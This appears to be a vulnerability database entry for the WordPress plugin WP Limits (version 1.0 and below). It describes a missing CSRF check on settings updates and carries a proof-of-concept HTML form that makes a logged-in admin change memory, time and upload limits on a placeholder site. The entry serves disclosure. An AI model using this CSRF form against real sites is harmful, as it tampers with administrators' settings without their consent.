Lucene search

K
wpexploitFrancesco CarlucciWPEX-ID:7CD524ED-5EB9-4D6B-B4D2-3D4BE6B57879
HistoryNov 15, 2021 - 12:00 a.m.

WP Limits <= 1.0 - Plugin's Settings Update via CSRF

2021-11-1500:00:00
Francesco Carlucci
96

0.001 Low

EPSS

Percentile

25.9%

The plugin does not have CSRF check when saving its settings, allowing attacker to make a logged in admin change them, which could make the blog unstable by setting low values

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp_define_limits" method="POST">
      <input type="hidden" name="process" value="wp_define_limits" />
      <input type="hidden" name="memory_limit" value="512" />
      <input type="hidden" name="process_time_limit" value="wp_define_limits" />
      <input type="hidden" name="time_limit" value="100" />
      <input type="hidden" name="process_upload_limit" value="wp_define_limits" />
      <input type="hidden" name="upload_limit" value="512" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

25.9%

Related for WPEX-ID:7CD524ED-5EB9-4D6B-B4D2-3D4BE6B57879